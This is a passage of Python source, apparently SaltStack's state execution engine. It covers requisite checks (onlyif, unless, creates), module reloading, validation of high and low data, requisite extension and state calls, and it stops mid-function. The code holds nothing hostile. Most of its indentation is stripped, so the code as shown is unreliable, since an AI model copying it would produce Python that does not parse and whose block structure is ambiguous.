def _mod_aggregate(self, low, running, chunks):
"""
        Execute the aggregation systems to modify the low chunk at runtime
"""
agg_opt = self.functions["config.option"]("state_aggregate")
if "aggregate" in low:
agg_opt = low["aggregate"]
if agg_opt is True:
agg_opt = [low["state"]]
elif not isinstance(agg_opt, list):
return low
if low["state"] in agg_opt and not low.get("__agg__"):
agg_fun = "{}.mod_aggregate".format(low["state"])
if agg_fun in self.states:
try:
low = self.states[agg_fun](low, chunks, running)
low["__agg__"] = True
except TypeError:
log.error("Failed to execute aggregate for state %s", low["state"])
return low
def _run_check(self, low_data):
"""
        Evaluate the onlyif, unless, and creates requisites for a low chunk.
"""
ret = {"result": False, "comment": []}
cmd_opts = {}
# Set arguments from cmd.run state as appropriate
POSSIBLE_CMD_ARGS = (
"cwd",
"root",
"runas",
"env",
"prepend_path",
"umask",
"timeout",
"success_retcodes",
)
for run_cmd_arg in POSSIBLE_CMD_ARGS:
cmd_opts[run_cmd_arg] = low_data.get(run_cmd_arg)
if "shell" in low_data:
cmd_opts["shell"] = low_data["shell"]
elif "shell" in self.opts["grains"]:
cmd_opts["shell"] = self.opts["grains"].get("shell")
if "onlyif" in low_data:
_ret = self._run_check_onlyif(low_data, cmd_opts)
ret["result"] = _ret["result"]
ret["comment"].append(_ret["comment"])
if "skip_watch" in _ret:
ret["skip_watch"] = _ret["skip_watch"]
if "unless" in low_data:
_ret = self._run_check_unless(low_data, cmd_opts)
# If either result is True, the returned result should be True
ret["result"] = _ret["result"] or ret["result"]
ret["comment"].append(_ret["comment"])
if "skip_watch" in _ret:
# If either result is True, the returned result should be True
ret["skip_watch"] = _ret["skip_watch"] or ret["skip_watch"]
if "creates" in low_data:
_ret = self._run_check_creates(low_data)
ret["result"] = _ret["result"] or ret["result"]
ret["comment"].append(_ret["comment"])
if "skip_watch" in _ret:
# If either result is True, the returned result should be True
ret["skip_watch"] = _ret["skip_watch"] or ret["skip_watch"]
return ret
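    # Putting the three checks together (hypothetical low data): for a chunk with
    #     {'onlyif': 'test -f /etc/motd', 'unless': 'grep -q banner /etc/motd'}
    # the state function only runs when the onlyif command exits 0 and the unless
    # command exits non-zero; otherwise the returned dict carries result=True and
    # skip_watch=True so the state is reported as skipped rather than executed.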
def _run_check_function(self, entry):
"""Format slot args and run unless/onlyif function."""
fun = entry.pop("fun")
args = entry.pop("args") if "args" in entry else []
cdata = {"args": args, "kwargs": entry}
self.format_slots(cdata)
return self.functions[fun](*cdata["args"], **cdata["kwargs"])
def _run_check_onlyif(self, low_data, cmd_opts):
"""
        Check the onlyif requisite; the state runs only when the onlyif condition evaluates true (command returns 0).
"""
ret = {"result": False}
if not isinstance(low_data["onlyif"], list):
low_data_onlyif = [low_data["onlyif"]]
else:
low_data_onlyif = low_data["onlyif"]
def _check_cmd(cmd):
if cmd != 0 and ret["result"] is False:
ret.update(
{
"comment": "onlyif condition is false",
"skip_watch": True,
"result": True,
}
)
elif cmd == 0:
ret.update({"comment": "onlyif condition is true", "result": False})
for entry in low_data_onlyif:
if isinstance(entry, str):
try:
cmd = self.functions["cmd.retcode"](
entry, ignore_retcode=True, python_shell=True, **cmd_opts
)
except CommandExecutionError:
# Command failed, notify onlyif to skip running the item
cmd = 100
log.debug("Last command return code: %s", cmd)
_check_cmd(cmd)
elif isinstance(entry, dict):
if "fun" not in entry:
ret["comment"] = "no `fun` argument in onlyif: {}".format(entry)
log.warning(ret["comment"])
return ret
get_return = entry.pop("get_return", None)
result = self._run_check_function(entry)
if get_return:
result = salt.utils.data.traverse_dict_and_list(result, get_return)
if self.state_con.get("retcode", 0):
_check_cmd(self.state_con["retcode"])
elif not result:
ret.update(
{
"comment": "onlyif condition is false",
"skip_watch": True,
"result": True,
}
)
else:
ret.update({"comment": "onlyif condition is true", "result": False})
else:
ret.update(
{
"comment": "onlyif execution failed, bad type passed",
"result": False,
}
)
return ret
def _run_check_unless(self, low_data, cmd_opts):
"""
        Check the unless requisite; the state is skipped when the unless condition evaluates true (command returns 0).
"""
ret = {"result": False}
if not isinstance(low_data["unless"], list):
low_data_unless = [low_data["unless"]]
else:
low_data_unless = low_data["unless"]
def _check_cmd(cmd):
if cmd == 0 and ret["result"] is False:
ret.update(
{
"comment": "unless condition is true",
"skip_watch": True,
"result": True,
}
)
elif cmd != 0:
ret.update({"comment": "unless condition is false", "result": False})
for entry in low_data_unless:
if isinstance(entry, str):
try:
cmd = self.functions["cmd.retcode"](
entry, ignore_retcode=True, python_shell=True, **cmd_opts
)
log.debug("Last command return code: %s", cmd)
except CommandExecutionError:
# Command failed, so notify unless to skip the item
cmd = 0
_check_cmd(cmd)
elif isinstance(entry, dict):
if "fun" not in entry:
ret["comment"] = "no `fun` argument in unless: {}".format(entry)
log.warning(ret["comment"])
return ret
get_return = entry.pop("get_return", None)
result = self._run_check_function(entry)
if get_return:
result = salt.utils.data.traverse_dict_and_list(result, get_return)
if self.state_con.get("retcode", 0):
_check_cmd(self.state_con["retcode"])
elif result:
ret.update(
{
"comment": "unless condition is true",
"skip_watch": True,
"result": True,
}
)
else:
ret.update(
{"comment": "unless condition is false", "result": False}
)
else:
ret.update(
{
"comment": "unless condition is false, bad type passed",
"result": False,
}
)
# No reason to stop, return ret
return ret
def _run_check_cmd(self, low_data):
"""
Alter the way a successful state run is determined
"""
ret = {"result": False}
cmd_opts = {}
if "shell" in self.opts["grains"]:
cmd_opts["shell"] = self.opts["grains"].get("shell")
for entry in low_data["check_cmd"]:
cmd = self.functions["cmd.retcode"](
entry, ignore_retcode=True, python_shell=True, **cmd_opts
)
log.debug("Last command return code: %s", cmd)
if cmd == 0 and ret["result"] is False:
ret.update(
{
"comment": "check_cmd determined the state succeeded",
"result": True,
}
)
elif cmd != 0:
ret.update(
{
"comment": "check_cmd determined the state failed",
"result": False,
}
)
return ret
return ret
def _run_check_creates(self, low_data):
"""
Check that listed files exist
"""
ret = {"result": False}
if isinstance(low_data["creates"], str) and os.path.exists(low_data["creates"]):
ret["comment"] = "{} exists".format(low_data["creates"])
ret["result"] = True
ret["skip_watch"] = True
elif isinstance(low_data["creates"], list) and all(
[os.path.exists(path) for path in low_data["creates"]]
):
ret["comment"] = "All files in creates exist"
ret["result"] = True
ret["skip_watch"] = True
else:
ret["comment"] = "Creates files not found"
ret["result"] = False
return ret
def reset_run_num(self):
"""
        Reset the run_num value to 0
"""
self.__run_num = 0
def _load_states(self):
"""
        Read the state loader value and load up the correct states subsystem
"""
if self.states_loader == "thorium":
self.states = salt.loader.thorium(
self.opts, self.functions, {}
) # TODO: Add runners, proxy?
else:
self.states = salt.loader.states(
self.opts,
self.functions,
self.utils,
self.serializers,
context=self.state_con,
proxy=self.proxy,
)
def load_modules(self, data=None, proxy=None):
"""
Load the modules into the state
"""
log.info("Loading fresh modules for state activity")
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(
self.opts, self.state_con, utils=self.utils, proxy=self.proxy
)
if isinstance(data, dict):
if data.get("provider", False):
if isinstance(data["provider"], str):
providers = [{data["state"]: data["provider"]}]
elif isinstance(data["provider"], list):
providers = data["provider"]
else:
providers = {}
for provider in providers:
for mod in provider:
funcs = salt.loader.raw_mod(
self.opts, provider[mod], self.functions
)
if funcs:
for func in funcs:
f_key = "{}{}".format(mod, func[func.rindex(".") :])
self.functions[f_key] = funcs[func]
self.serializers = salt.loader.serializers(self.opts)
self._load_states()
self.rend = salt.loader.render(
self.opts,
self.functions,
states=self.states,
proxy=self.proxy,
context=self.state_con,
)
def module_refresh(self):
"""
Refresh all the modules
"""
log.debug("Refreshing modules...")
if self.opts["grains"].get("os") != "MacOS":
# In case a package has been installed into the current python
# process 'site-packages', the 'site' module needs to be reloaded in
# order for the newly installed package to be importable.
            try:
                reload_module(site)
            except (RuntimeError, TypeError):
                log.error(
                    "Error encountered during module reload. Modules were not reloaded."
                )
self.load_modules()
if not self.opts.get("local", False) and self.opts.get("multiprocessing", True):
self.functions["saltutil.refresh_modules"]()
def check_refresh(self, data, ret):
"""
Check to see if the modules for this state instance need to be updated,
only update if the state is a file or a package and if it changed
        something. If the file function is 'managed', check whether the file is a
        possible module type, e.g. a .py, .pyx, or .so file. Always refresh if the
        function is 'recurse', since that can lay down anything.
"""
_reload_modules = False
if data.get("reload_grains", False):
log.debug("Refreshing grains...")
self.opts["grains"] = salt.loader.grains(self.opts)
_reload_modules = True
if data.get("reload_pillar", False):
log.debug("Refreshing pillar...")
self.opts["pillar"] = self._gather_pillar()
_reload_modules = True
if not ret["changes"]:
if data.get("force_reload_modules", False):
self.module_refresh()
return
if data.get("reload_modules", False) or _reload_modules:
# User explicitly requests a reload
self.module_refresh()
return
if data["state"] == "file":
if data["fun"] == "managed":
if data["name"].endswith((".py", ".pyx", ".pyo", ".pyc", ".so")):
self.module_refresh()
elif data["fun"] == "recurse":
self.module_refresh()
elif data["fun"] == "symlink":
if "bin" in data["name"]:
self.module_refresh()
elif data["state"] in ("pkg", "ports", "pip"):
self.module_refresh()
def verify_data(self, data):
"""
Verify the data, return an error statement if something is wrong
"""
errors = []
if "state" not in data:
errors.append('Missing "state" data')
if "fun" not in data:
errors.append('Missing "fun" data')
if "name" not in data:
errors.append('Missing "name" data')
if data["name"] and not isinstance(data["name"], str):
errors.append(
"ID '{}' {}is not formed as a string, but is a {}".format(
data["name"],
"in SLS '{}' ".format(data["__sls__"]) if "__sls__" in data else "",
type(data["name"]).__name__,
)
)
if errors:
return errors
full = data["state"] + "." + data["fun"]
if full not in self.states:
if "__sls__" in data:
errors.append(
"State '{}' was not found in SLS '{}'".format(full, data["__sls__"])
)
reason = self.states.missing_fun_string(full)
if reason:
errors.append("Reason: {}".format(reason))
else:
errors.append("Specified state '{}' was not found".format(full))
else:
# First verify that the parameters are met
aspec = salt.utils.args.get_function_argspec(self.states[full])
arglen = 0
deflen = 0
if isinstance(aspec.args, list):
arglen = len(aspec.args)
if isinstance(aspec.defaults, tuple):
deflen = len(aspec.defaults)
for ind in range(arglen - deflen):
if aspec.args[ind] not in data:
errors.append(
"Missing parameter {} for state {}".format(
aspec.args[ind], full
)
)
# If this chunk has a recursive require, then it will cause a
# recursive loop when executing, check for it
reqdec = ""
if "require" in data:
reqdec = "require"
if "watch" in data:
            # Check to see if the state has a mod_watch function; if it does
            # not, fall back to a plain require: extend the require statement
            # with the contents of watch so that mod_watch is not called but
            # the requisite behavior is still honored.
if "{}.mod_watch".format(data["state"]) not in self.states:
if "require" in data:
data["require"].extend(data.pop("watch"))
else:
data["require"] = data.pop("watch")
reqdec = "require"
else:
reqdec = "watch"
if reqdec:
for req in data[reqdec]:
reqfirst = next(iter(req))
if data["state"] == reqfirst:
if fnmatch.fnmatch(data["name"], req[reqfirst]) or fnmatch.fnmatch(
data["__id__"], req[reqfirst]
):
err = (
"Recursive require detected in SLS {} for"
" require {} in ID {}"
).format(data["__sls__"], req, data["__id__"])
errors.append(err)
return errors
def verify_high(self, high):
"""
Verify that the high data is viable and follows the data structure
"""
errors = []
if not isinstance(high, dict):
errors.append("High data is not a dictionary and is invalid")
reqs = OrderedDict()
for name, body in high.items():
try:
if name.startswith("__"):
continue
except AttributeError:
pass
if not isinstance(name, str):
errors.append(
"ID '{}' in SLS '{}' is not formed as a string, but "
"is a {}. It may need to be quoted.".format(
name, body["__sls__"], type(name).__name__
)
)
if not isinstance(body, dict):
err = "The type {} in {} is not formatted as a dictionary".format(
name, body
)
errors.append(err)
continue
for state in body:
if state.startswith("__"):
continue
if body[state] is None:
errors.append(
"ID '{}' in SLS '{}' contains a short declaration "
"({}) with a trailing colon. When not passing any "
"arguments to a state, the colon must be omitted.".format(
name, body["__sls__"], state
)
)
continue
if not isinstance(body[state], list):
errors.append(
"State '{}' in SLS '{}' is not formed as a list".format(
name, body["__sls__"]
)
)
else:
fun = 0
if "." in state:
fun += 1
for arg in body[state]:
if isinstance(arg, str):
fun += 1
if " " in arg.strip():
errors.append(
(
'The function "{}" in state '
'"{}" in SLS "{}" has '
"whitespace, a function with whitespace is "
"not supported, perhaps this is an argument "
'that is missing a ":"'
).format(arg, name, body["__sls__"])
)
elif isinstance(arg, dict):
# The arg is a dict, if the arg is require or
# watch, it must be a list.
#
# Add the requires to the reqs dict and check them
# all for recursive requisites.
argfirst = next(iter(arg))
if argfirst == "names":
if not isinstance(arg[argfirst], list):
errors.append(
"The 'names' argument in state "
"'{}' in SLS '{}' needs to be "
"formed as a list".format(name, body["__sls__"])
)
if argfirst in ("require", "watch", "prereq", "onchanges"):
if not isinstance(arg[argfirst], list):
errors.append(
"The {} statement in state '{}' in "
"SLS '{}' needs to be formed as a "
"list".format(argfirst, name, body["__sls__"])
)
# It is a list, verify that the members of the
# list are all single key dicts.
else:
reqs[name] = OrderedDict(state=state)
for req in arg[argfirst]:
if isinstance(req, str):
req = {"id": req}
if not isinstance(req, dict):
err = (
"Requisite declaration {}"
" in SLS {} is not formed as a"
" single key dictionary"
).format(req, body["__sls__"])
errors.append(err)
continue
req_key = next(iter(req))
req_val = req[req_key]
if "." in req_key:
errors.append(
"Invalid requisite type '{}' "
"in state '{}', in SLS "
"'{}'. Requisite types must "
"not contain dots, did you "
"mean '{}'?".format(
req_key,
name,
body["__sls__"],
req_key[: req_key.find(".")],
)
)
if not ishashable(req_val):
errors.append(
(
'Illegal requisite "{}", '
"please check your syntax.\n"
).format(req_val)
)
continue
# Check for global recursive requisites
reqs[name][req_val] = req_key
# I am going beyond 80 chars on
# purpose, this is just too much
# of a pain to deal with otherwise
if req_val in reqs:
if name in reqs[req_val]:
if reqs[req_val][name] == state:
if (
reqs[req_val]["state"]
== reqs[name][req_val]
):
err = (
"A recursive "
"requisite was found, SLS "
'"{}" ID "{}" ID "{}"'
).format(
body["__sls__"],
name,
req_val,
)
errors.append(err)
# Make sure that there is only one key in the
# dict
if len(list(arg)) != 1:
errors.append(
"Multiple dictionaries defined in "
"argument of state '{}' in SLS '{}'".format(
name, body["__sls__"]
)
)
if not fun:
if state == "require" or state == "watch":
continue
errors.append(
"No function declared in state '{}' in SLS '{}'".format(
state, body["__sls__"]
)
)
elif fun > 1:
errors.append(
"Too many functions declared in state '{}' in "
"SLS '{}'".format(state, body["__sls__"])
)
return errors
def verify_chunks(self, chunks):
"""
Verify the chunks in a list of low data structures
"""
err = []
for chunk in chunks:
err.extend(self.verify_data(chunk))
return err
def order_chunks(self, chunks):
"""
Sort the chunk list verifying that the chunks follow the order
specified in the order options.
"""
cap = 1
for chunk in chunks:
if "order" in chunk:
if not isinstance(chunk["order"], int):
continue
chunk_order = chunk["order"]
if chunk_order > cap - 1 and chunk_order > 0:
cap = chunk_order + 100
for chunk in chunks:
if "order" not in chunk:
chunk["order"] = cap
continue
if not isinstance(chunk["order"], (int, float)):
if chunk["order"] == "last":
chunk["order"] = cap + 1000000
elif chunk["order"] == "first":
chunk["order"] = 0
else:
chunk["order"] = cap
if "name_order" in chunk:
chunk["order"] = chunk["order"] + chunk.pop("name_order") / 10000.0
if chunk["order"] < 0:
chunk["order"] = cap + 1000000 + chunk["order"]
chunks.sort(
key=lambda chunk: (
chunk["order"],
"{0[state]}{0[name]}{0[fun]}".format(chunk),
)
)
return chunks
def compile_high_data(self, high, orchestration_jid=None):
"""
"Compile" the high data as it is retrieved from the CLI or YAML into
the individual state executor structures
"""
chunks = []
for name, body in high.items():
if name.startswith("__"):
continue
for state, run in body.items():
funcs = set()
names = []
if state.startswith("__"):
continue
chunk = {"state": state, "name": name}
if orchestration_jid is not None:
chunk["__orchestration_jid__"] = orchestration_jid
if "__sls__" in body:
chunk["__sls__"] = body["__sls__"]
if "__env__" in body:
chunk["__env__"] = body["__env__"]
chunk["__id__"] = name
for arg in run:
if isinstance(arg, str):
funcs.add(arg)
continue
if isinstance(arg, dict):
for key, val in arg.items():
if key == "names":
for _name in val:
if _name not in names:
names.append(_name)
elif key == "state":
# Don't pass down a state override
continue
elif key == "name" and not isinstance(val, str):
# Invalid name, fall back to ID
chunk[key] = name
else:
chunk[key] = val
if names:
name_order = 1
for entry in names:
live = copy.deepcopy(chunk)
if isinstance(entry, dict):
low_name = next(iter(entry.keys()))
live["name"] = low_name
list(map(live.update, entry[low_name]))
else:
live["name"] = entry
live["name_order"] = name_order
name_order += 1
for fun in funcs:
live["fun"] = fun
chunks.append(live)
else:
live = copy.deepcopy(chunk)
for fun in funcs:
live["fun"] = fun
chunks.append(live)
chunks = self.order_chunks(chunks)
return chunks
def reconcile_extend(self, high):
"""
Pull the extend data and add it to the respective high data
"""
errors = []
if "__extend__" not in high:
return high, errors
ext = high.pop("__extend__")
for ext_chunk in ext:
for name, body in ext_chunk.items():
if name not in high:
state_type = next(x for x in body if not x.startswith("__"))
# Check for a matching 'name' override in high data
ids = find_name(name, state_type, high)
if len(ids) != 1:
errors.append(
"Cannot extend ID '{0}' in '{1}:{2}'. It is not "
"part of the high state.\n"
"This is likely due to a missing include statement "
"or an incorrectly typed ID.\nEnsure that a "
"state with an ID of '{0}' is available\nin "
"environment '{1}' and to SLS '{2}'".format(
name,
body.get("__env__", "base"),
body.get("__sls__", "base"),
)
)
continue
else:
name = ids[0][0]
for state, run in body.items():
if state.startswith("__"):
continue
if state not in high[name]:
high[name][state] = run
continue
# high[name][state] is extended by run, both are lists
for arg in run:
update = False
for hind in range(len(high[name][state])):
if isinstance(arg, str) and isinstance(
high[name][state][hind], str
):
# replacing the function, replace the index
high[name][state].pop(hind)
high[name][state].insert(hind, arg)
update = True
continue
if isinstance(arg, dict) and isinstance(
high[name][state][hind], dict
):
# It is an option, make sure the options match
argfirst = next(iter(arg))
if argfirst == next(iter(high[name][state][hind])):
# If argfirst is a requisite then we must merge
# our requisite with that of the target state
if argfirst in STATE_REQUISITE_KEYWORDS:
high[name][state][hind][argfirst].extend(
arg[argfirst]
)
                                    # otherwise, it's not a requisite and we are just extending (replacing)
else:
high[name][state][hind] = arg
update = True
if (
argfirst == "name"
and next(iter(high[name][state][hind])) == "names"
):
# If names are overwritten by name use the name
high[name][state][hind] = arg
if not update:
high[name][state].append(arg)
return high, errors
def apply_exclude(self, high):
"""
Read in the __exclude__ list and remove all excluded objects from the
high data
"""
if "__exclude__" not in high:
return high
ex_sls = set()
ex_id = set()
exclude = high.pop("__exclude__")
for exc in exclude:
if isinstance(exc, str):
# The exclude statement is a string, assume it is an sls
ex_sls.add(exc)
if isinstance(exc, dict):
# Explicitly declared exclude
if len(exc) != 1:
continue
key = next(iter(exc.keys()))
if key == "sls":
ex_sls.add(exc["sls"])
elif key == "id":
ex_id.add(exc["id"])
# Now the excludes have been simplified, use them
if ex_sls:
# There are sls excludes, find the associated ids
for name, body in high.items():
if name.startswith("__"):
continue
sls = body.get("__sls__", "")
if not sls:
continue
for ex_ in ex_sls:
if fnmatch.fnmatch(sls, ex_):
ex_id.add(name)
for id_ in ex_id:
if id_ in high:
high.pop(id_)
return high
def requisite_in(self, high):
"""
Extend the data reference with requisite_in arguments
"""
req_in = {
"require_in",
"watch_in",
"onfail_in",
"onchanges_in",
"use",
"use_in",
"prereq",
"prereq_in",
}
req_in_all = req_in.union(
{"require", "watch", "onfail", "onfail_stop", "onchanges"}
)
extend = {}
errors = []
disabled_reqs = self.opts.get("disabled_requisites", [])
if not isinstance(disabled_reqs, list):
disabled_reqs = [disabled_reqs]
for id_, body in high.items():
if not isinstance(body, dict):
continue
for state, run in body.items():
if state.startswith("__"):
continue
for arg in run:
if isinstance(arg, dict):
# It is not a function, verify that the arg is a
# requisite in statement
if len(arg) < 1:
# Empty arg dict
# How did we get this far?
continue
# Split out the components
key = next(iter(arg))
if key not in req_in:
continue
if key in disabled_reqs:
log.warning(
"The %s requisite has been disabled, Ignoring.", key
)
continue
rkey = key.split("_")[0]
items = arg[key]
if isinstance(items, dict):
# Formatted as a single req_in
for _state, name in items.items():
# Not a use requisite_in
found = False
if name not in extend:
extend[name] = OrderedDict()
if "." in _state:
errors.append(
"Invalid requisite in {}: {} for "
"{}, in SLS '{}'. Requisites must "
"not contain dots, did you mean '{}'?".format(
rkey,
_state,
name,
body["__sls__"],
_state[: _state.find(".")],
)
)
_state = _state.split(".")[0]
if _state not in extend[name]:
extend[name][_state] = []
extend[name]["__env__"] = body["__env__"]
extend[name]["__sls__"] = body["__sls__"]
for ind in range(len(extend[name][_state])):
if next(iter(extend[name][_state][ind])) == rkey:
# Extending again
extend[name][_state][ind][rkey].append(
{state: id_}
)
found = True
if found:
continue
# The rkey is not present yet, create it
extend[name][_state].append({rkey: [{state: id_}]})
if isinstance(items, list):
# Formed as a list of requisite additions
hinges = []
for ind in items:
if not isinstance(ind, dict):
# Malformed req_in
if ind in high:
_ind_high = [
x
for x in high[ind]
if not x.startswith("__")
]
ind = {_ind_high[0]: ind}
else:
found = False
for _id in iter(high):
for state in [
state
for state in iter(high[_id])
if not state.startswith("__")
]:
for j in iter(high[_id][state]):
if (
isinstance(j, dict)
and "name" in j
):
if j["name"] == ind:
ind = {state: _id}
found = True
if not found:
continue
if len(ind) < 1:
continue
pstate = next(iter(ind))
pname = ind[pstate]
if pstate == "sls":
# Expand hinges here
hinges = find_sls_ids(pname, high)
else:
hinges.append((pname, pstate))
if "." in pstate:
errors.append(
"Invalid requisite in {}: {} for "
"{}, in SLS '{}'. Requisites must "
"not contain dots, did you mean '{}'?".format(
rkey,
pstate,
pname,
body["__sls__"],
pstate[: pstate.find(".")],
)
)
pstate = pstate.split(".")[0]
for tup in hinges:
name, _state = tup
if key == "prereq_in":
# Add prerequired to origin
if id_ not in extend:
extend[id_] = OrderedDict()
if state not in extend[id_]:
extend[id_][state] = []
extend[id_][state].append(
{"prerequired": [{_state: name}]}
)
if key == "prereq":
# Add prerequired to prereqs
ext_ids = find_name(name, _state, high)
for ext_id, _req_state in ext_ids:
if ext_id not in extend:
extend[ext_id] = OrderedDict()
if _req_state not in extend[ext_id]:
extend[ext_id][_req_state] = []
extend[ext_id][_req_state].append(
{"prerequired": [{state: id_}]}
)
continue
if key == "use_in":
# Add the running states args to the
# use_in states
ext_ids = find_name(name, _state, high)
for ext_id, _req_state in ext_ids:
if not ext_id:
continue
ext_args = state_args(ext_id, _state, high)
if ext_id not in extend:
extend[ext_id] = OrderedDict()
if _req_state not in extend[ext_id]:
extend[ext_id][_req_state] = []
ignore_args = req_in_all.union(ext_args)
for arg in high[id_][state]:
if not isinstance(arg, dict):
continue
if len(arg) != 1:
continue
if next(iter(arg)) in ignore_args:
continue
# Don't use name or names
if next(iter(arg.keys())) == "name":
continue
if next(iter(arg.keys())) == "names":
continue
extend[ext_id][_req_state].append(arg)
continue
if key == "use":
# Add the use state's args to the
# running state
ext_ids = find_name(name, _state, high)
for ext_id, _req_state in ext_ids:
if not ext_id:
continue
loc_args = state_args(id_, state, high)
if id_ not in extend:
extend[id_] = OrderedDict()
if state not in extend[id_]:
extend[id_][state] = []
ignore_args = req_in_all.union(loc_args)
for arg in high[ext_id][_req_state]:
if not isinstance(arg, dict):
continue
if len(arg) != 1:
continue
if next(iter(arg)) in ignore_args:
continue
# Don't use name or names
if next(iter(arg.keys())) == "name":
continue
if next(iter(arg.keys())) == "names":
continue
extend[id_][state].append(arg)
continue
found = False
if name not in extend:
extend[name] = OrderedDict()
if _state not in extend[name]:
extend[name][_state] = []
extend[name]["__env__"] = body["__env__"]
extend[name]["__sls__"] = body["__sls__"]
for ind in range(len(extend[name][_state])):
if (
next(iter(extend[name][_state][ind]))
== rkey
):
# Extending again
extend[name][_state][ind][rkey].append(
{state: id_}
)
found = True
if found:
continue
# The rkey is not present yet, create it
extend[name][_state].append({rkey: [{state: id_}]})
high["__extend__"] = []
for key, val in extend.items():
high["__extend__"].append({key: val})
req_in_high, req_in_errors = self.reconcile_extend(high)
errors.extend(req_in_errors)
return req_in_high, errors
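    # Illustrative *_in rewrite performed above (hypothetical SLS): an
    #     apache: {'service': ['running', {'watch_in': [{'cmd': 'reload-httpd'}]}]}
    # entry causes the 'reload-httpd' cmd state to be extended with
    # {'watch': [{'service': 'apache'}]}; i.e. the *_in requisite is flipped into
    # the plain requisite on the target state via '__extend__' and reconcile_extend().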
def _call_parallel_target(self, name, cdata, low):
"""
The target function to call that will create the parallel thread/process
"""
# we need to re-record start/end duration here because it is impossible to
# correctly calculate further down the chain
utc_start_time = datetime.datetime.utcnow()
self.format_slots(cdata)
tag = _gen_tag(low)
try:
ret = self.states[cdata["full"]](*cdata["args"], **cdata["kwargs"])
except Exception as exc: # pylint: disable=broad-except
log.debug(
"An exception occurred in this state: %s",
exc,
exc_info_on_loglevel=logging.DEBUG,
)
trb = traceback.format_exc()
ret = {
"result": False,
"name": name,
"changes": {},
"comment": "An exception occurred in this state: {}".format(trb),
}
utc_finish_time = datetime.datetime.utcnow()
delta = utc_finish_time - utc_start_time
# duration in milliseconds.microseconds
duration = (delta.seconds * 1000000 + delta.microseconds) / 1000.0
ret["duration"] = duration
troot = os.path.join(self.opts["cachedir"], self.jid)
tfile = os.path.join(troot, salt.utils.hashutils.sha1_digest(tag))
if not os.path.isdir(troot):
try:
os.makedirs(troot)
except OSError:
# Looks like the directory was created between the check
# and the attempt, we are safe to pass
pass
with salt.utils.files.fopen(tfile, "wb+") as fp_:
fp_.write(msgpack_serialize(ret))
def call_parallel(self, cdata, low):
"""
Call the state defined in the given cdata in parallel
"""
        # There are a number of ways the cdata may not be populated with what
        # we expected, so be careful not to raise another KeyError: the name is
        # easily guessable, and in all cases we fall back so that the real
        # exception is presented to the user.
name = (cdata.get("args") or [None])[0] or cdata["kwargs"].get("name")
if not name:
name = low.get("name", low.get("__id__"))
proc = salt.utils.process.Process(
target=self._call_parallel_target, args=(name, cdata, low)
)
proc.start()
ret = {
"name": name,
"result": None,
"changes": {},
"comment": "Started in a separate process",
"proc": proc,
}
return ret
@salt.utils.decorators.state.OutputUnifier("content_check", "unify")
def call(self, low, chunks=None, running=None, retries=1):
"""
Call a state directly with the low data structure, verify data
before processing.
"""
utc_start_time = datetime.datetime.utcnow()
local_start_time = utc_start_time - (
datetime.datetime.utcnow() - datetime.datetime.now()
)
log.info(
"Running state [%s] at time %s",
low["name"].strip() if isinstance(low["name"], str) else low["name"],
local_start_time.time().isoformat(),
)
errors = self.verify_data(low)
if errors:
ret = {
"result": False,
"name": low["name"],
"changes": {},
"comment": "",
}
for err in errors:
ret["comment"] += "{}\n".format(err)
ret["__run_num__"] = self.__run_num
self.__run_num += 1
format_log(ret)
self.check_refresh(low, ret)
return ret
else:
ret = {"result": False, "name": low["name"], "changes": {}}
self.state_con["runas"] = low.get("runas", None)
if low["state"] == "cmd" and "password" in low:
self.state_con["runas_password"] = low["password"]
else:
self.state_con["runas_password"] = low.get("runas_password", None)
if not low.get("__prereq__"):
log.info(
"Executing state %s.%s for [%s]",
low["state"],
low["fun"],
low["name"].strip() if isinstance(low["name"], str) else low["name"],
)
if "provider" in low:
self.load_modules(low)
state_func_name = "{0[state]}.{0[fun]}".format(low)
cdata = salt.utils.args.format_call(
self.states[state_func_name],
low,
initial_ret={"full": state_func_name},
expected_extra_kws=STATE_INTERNAL_KEYWORDS,
)
inject_globals = {
# Pass a copy of the running dictionary, the low state chunks and
# the current state dictionaries.
# We pass deep copies here because we don't want any misbehaving
# state module to change these at runtime.
"__low__": immutabletypes.freeze(low),
"__running__": immutabletypes.freeze(running) if running else {},
"__instance_id__": self.instance_id,
"__lowstate__": immutabletypes.freeze(chunks) if chunks else {},
}
if "__env__" in low:
inject_globals["__env__"] = str(low["__env__"])
if self.inject_globals:
inject_globals.update(self.inject_globals)
if low.get("__prereq__"):
test = sys.modules[self.states[cdata["full"]].__module__].__opts__["test"]
sys.modules[self.states[cdata["full"]].__module__].__opts__["test"] = True
try:
# Let's get a reference to the salt environment to use within this
# state call.
#
# If the state function accepts an 'env' keyword argument, it
# allows the state to be overridden(we look for that in cdata). If
# that's not found in cdata, we look for what we're being passed in
# the original data, namely, the special dunder __env__. If that's
# not found we default to 'base'
req_list = ("unless", "onlyif", "creates")
if (
any(req in low for req in req_list)
and "{0[state]}.mod_run_check".format(low) not in self.states
):
ret.update(self._run_check(low))
if not self.opts.get("lock_saltenv", False):
# NOTE: Overriding the saltenv when lock_saltenv is blocked in
# salt/modules/state.py, before we ever get here, but this
# additional check keeps use of the State class outside of the
# salt/modules/state.py from getting around this setting.
if "saltenv" in low:
inject_globals["__env__"] = str(low["saltenv"])
elif isinstance(cdata["kwargs"].get("env", None), str):
# User is using a deprecated env setting which was parsed by
# format_call.
# We check for a string type since module functions which
# allow setting the OS environ also make use of the "env"
# keyword argument, which is not a string
inject_globals["__env__"] = str(cdata["kwargs"]["env"])
if "__env__" not in inject_globals:
# Let's use the default environment
inject_globals["__env__"] = "base"
if "__orchestration_jid__" in low:
inject_globals["__orchestration_jid__"] = low["__orchestration_jid__"]
if "result" not in ret or ret["result"] is False:
self.states.inject_globals = inject_globals
if self.mocked:
ret = mock_ret(cdata)
else:
# Execute the state function
if not low.get("__prereq__") and low.get("parallel"):
# run the state call in parallel, but only if not in a prereq
ret = self.call_parallel(cdata, low)
else:
self.format_slots(cdata)
ret = self.states[cdata["full"]](
*cdata["args"], **cdata["kwargs"]
)
self.states.inject_globals = {}
if (
"check_cmd" in low
and "{0[state]}.mod_run_check_cmd".format(low) not in self.states
):
ret.update(self._run_check_cmd(low))
except Exception as exc: # pylint: disable=broad-except
log.debug(
"An exception occurred in this state: %s",
exc,
exc_info_on_loglevel=logging.DEBUG,
)
trb = traceback.format_exc()
            # There are a number of ways the cdata may not be populated with what
            # we expected, so be careful not to raise another KeyError: the name is
            # easily guessable, and in all cases we fall back so that the real
            # exception is presented to the user.
name = (cdata.get("args") or [None])[0] or cdata["kwargs"].get("name")
if not name:
name = low.get("name", low.get("__id__"))
ret = {
"result": False,
"name": name,
"changes": {},
